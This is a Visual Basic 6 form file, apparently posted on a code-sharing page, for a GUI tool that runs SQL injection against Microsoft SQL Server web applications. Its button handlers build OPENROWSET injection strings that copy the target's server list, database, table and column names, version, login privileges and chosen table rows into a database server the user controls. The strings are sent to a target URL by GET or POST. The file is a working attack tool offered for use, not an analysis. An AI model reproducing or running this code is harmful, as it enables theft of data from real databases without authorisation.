📄 main.frm
字号:
Height = 2010
Left = 1605
TabIndex = 9
Top = 375
Width = 1590
End
Begin VB.ListBox LstLinkedServer
Height = 2010
Left = 135
TabIndex = 8
Top = 375
Width = 1395
End
Begin VB.CommandButton CmdListFields
Caption = "List Fields>>"
Height = 390
Left = 6360
TabIndex = 13
Top = 615
Width = 1140
End
Begin VB.CommandButton CmdListTables
Caption = "List Tables>>"
Height = 390
Left = 3285
TabIndex = 11
Top = 615
Width = 1140
End
Begin VB.Label Label9
AutoSize = -1 'True
Caption = "Fields :"
Height = 195
Left = 7485
TabIndex = 29
Top = 150
Width = 495
End
Begin VB.Label Label8
AutoSize = -1 'True
Caption = "Tables :"
Height = 195
Left = 4515
TabIndex = 28
Top = 165
Width = 570
End
Begin VB.Label Label7
AutoSize = -1 'True
Caption = "Databases :"
Height = 195
Left = 1710
TabIndex = 27
Top = 150
Width = 855
End
Begin VB.Label Label6
AutoSize = -1 'True
Caption = "Linked Servers :"
Height = 195
Left = 195
TabIndex = 26
Top = 135
Width = 1155
End
End
Begin VB.Label Label11
AutoSize = -1 'True
Caption = "Results :"
Height = 195
Left = 120
TabIndex = 32
Top = 5160
Width = 615
End
End
Attribute VB_Name = "FrmMain"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Option Explicit
Dim Url As String
Dim PostData As String
Dim Method As String
Private Sub CboMethod_Click()
If CboMethod.ListIndex Then
TxtPostData.Enabled = True
Else
TxtPostData.Enabled = False
End If
End Sub
Private Sub CmdGo_Click()
Dim DATABASES_INJECTION_STR As String
Dim SERVERS_INJECTION_STR As String
Dim VERSION_INJECTION_STR As String
On Error GoTo DisplayError
If TxtUrl.Text <> "" Then
If (CboMethod.Text = "POST" And TxtPostData.Text <> "") Or (CboMethod.Text = "GET") Then
DATABASES_INJECTION_STR = " insert into openrowset('sqloledb','Network=DBMSSOCN;Address=" + TxtServer.Text + "," + TxtPort.Text + ";uid=" + TxtLogin.Text + ";pwd=" + TxtPassword.Text + "','select * from ##databases') select name from master.dbo.sysdatabases--"
SERVERS_INJECTION_STR = " insert into openrowset('sqloledb','Network=DBMSSOCN;Address=" + TxtServer.Text + "," + TxtPort.Text + ";uid=" + TxtLogin.Text + ";pwd=" + TxtPassword.Text + "','select * from ##servers') select srvname from master.dbo.sysservers--"
VERSION_INJECTION_STR = " insert into openrowset('sqloledb','Network=DBMSSOCN;Address=" + TxtServer.Text + "," + TxtPort.Text + ";uid=" + TxtLogin.Text + ";pwd=" + TxtPassword.Text + "','select * from ##version') select @@VERSION union all select 'Login name: ' %2B suser_sname() %2B char(13) %2B 'User name: ' %2B user %2B char(13) %2B 'Is db_owner: ' %2B convert(varchar(1),IS_MEMBER ('db_owner') ) %2B char(13) %2B 'Is sysadmin: ' %2B convert(varchar(1),IS_SRVROLEMEMBER('sysadmin')) --"
ClearLists
Connect TxtServer.Text, TxtLogin.Text, TxtPassword.Text, TxtPort.Text
CreateTables
SetVars
SubmitInjection Url, Method, PostData, DATABASES_INJECTION_STR
SetVars
SubmitInjection Url, Method, PostData, SERVERS_INJECTION_STR
SetVars
SubmitInjection Url, Method, PostData, VERSION_INJECTION_STR
GetVersion
GetServers
GetDatabases
Else
MsgBox "Please, Input the post data value"
End If
Else
MsgBox "Please, Input the url value"
End If
Exit Sub
DisplayError:
MsgBox Err.Description
End Sub
Private Sub CmdListFields_Click()
Dim FIELDS_INJECTION_STR As String
On Error GoTo DisplayError
If LstTables.List(LstTables.ListIndex) <> "" Then
FIELDS_INJECTION_STR = " insert into openrowset('sqloledb','Network=DBMSSOCN;Address=" + TxtServer.Text + "," + TxtPort.Text + ";uid=" + TxtLogin.Text + ";pwd=" + TxtPassword.Text + "','select * from ##fields') select name from " + LstDatabases.List(LstDatabases.ListIndex) + ".dbo.syscolumns where id=object_id('" + LstDatabases.List(LstDatabases.ListIndex) + ".." + LstTables.List(LstTables.ListIndex) + "')--"
SetVars
TxtQuery.Text = "Select "
SubmitInjection Url, Method, PostData, FIELDS_INJECTION_STR
GetFields
Else
MsgBox "Please, Select a table"
End If
Exit Sub
DisplayError:
MsgBox Err.Description
End Sub
Private Sub CmdListTables_Click()
Dim TABLES_INJECTION_STR As String
On Error GoTo DisplayError
If LstDatabases.List(LstDatabases.ListIndex) <> "" Then
If ChkSysTables Then
TABLES_INJECTION_STR = " insert into openrowset('sqloledb','Network=DBMSSOCN;Address=" + TxtServer.Text + "," + TxtPort.Text + ";uid=" + TxtLogin.Text + ";pwd=" + TxtPassword.Text + "','select * from ##tables') select name from " + LstDatabases.List(LstDatabases.ListIndex) + ".dbo.sysobjects where xtype='U' or xtype='S'--"
Else
TABLES_INJECTION_STR = " insert into openrowset('sqloledb','Network=DBMSSOCN;Address=" + TxtServer.Text + "," + TxtPort.Text + ";uid=" + TxtLogin.Text + ";pwd=" + TxtPassword.Text + "','select * from ##tables') select name from " + LstDatabases.List(LstDatabases.ListIndex) + ".dbo.sysobjects where xtype='U'--"
End If
SetVars
LstFields.Clear
TxtQuery.Text = "Select "
SubmitInjection Url, Method, PostData, TABLES_INJECTION_STR
GetTables
Else
MsgBox "Please, Select a Database"
End If
Exit Sub
DisplayError:
MsgBox Err.Description
End Sub
Private Sub CmdRunQuery_Click()
Dim Fields As String
Dim Query As String
Dim QUERY_INJECTION_STR As String
On Error GoTo DisplayError
If TxtQuery.Text <> "Select " Then
SetVars
Fields = Left(TxtQuery.Text, Len(TxtQuery) - 1)
Fields = Replace(Fields, "Select ", "")
Query = "Select top " + TxtMaxRows.Text + " " + Fields + " from " + LstDatabases.List(LstDatabases.ListIndex) + ".dbo." + LstTables.List(LstTables.ListIndex)
CreateTableResults Fields
QUERY_INJECTION_STR = " insert into openrowset('sqloledb','Network=DBMSSOCN;Address=" + TxtServer.Text + "," + TxtPort.Text + ";uid=" + TxtLogin.Text + ";pwd=" + TxtPassword.Text + "','select * from ##tableresults')" + Query + "--"
SubmitInjection Url, Method, PostData, QUERY_INJECTION_STR
GetResults
Else
MsgBox "Please, Select One or More Fields"
End If
Exit Sub
DisplayError:
MsgBox Err.Description
End Sub
Private Sub Form_Load()
CboMethod.ListIndex = 0
End Sub
Private Sub Form_Unload(Cancel As Integer)
On Error GoTo DisplayError
Disconnect
End
Exit Sub
DisplayError:
MsgBox Err.Description
End Sub
Private Sub LstFields_ItemCheck(Item As Integer)
On Error GoTo DisplayError
If InStr(1, TxtQuery.Text, " from", vbTextCompare) Then
TxtQuery.Text = Replace(TxtQuery.Text, " from " + LstDatabases.List(LstDatabases.ListIndex) + ".dbo." + LstTables.List(LstTables.ListIndex), "")
TxtQuery.Text = TxtQuery.Text + ","
End If
If LstFields.Selected(Item) Then
TxtQuery.Text = TxtQuery.Text + LstFields.List(Item) + ","
Else
TxtQuery.Text = Replace(TxtQuery.Text, LstFields.List(Item) + ",", "")
End If
Exit Sub
DisplayError:
MsgBox Err.Description
End Sub
Private Sub ClearLists()
LstLinkedServer.Clear
LstDatabases.Clear
LstTables.Clear
LstFields.Clear
End Sub
Private Sub SetVars()
Url = TxtUrl.Text
PostData = TxtPostData.Text
Method = CboMethod.Text
End Sub
Private Sub TxtMaxRows_KeyPress(KeyAscii As Integer)
If Not IsNumeric(Chr(KeyAscii)) And KeyAscii <> 8 Then
KeyAscii = 0
End If
End Sub
Private Sub TxtPort_KeyPress(KeyAscii As Integer)
If Not IsNumeric(Chr(KeyAscii)) And KeyAscii <> 8 Then
KeyAscii = 0
End If
End Sub
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -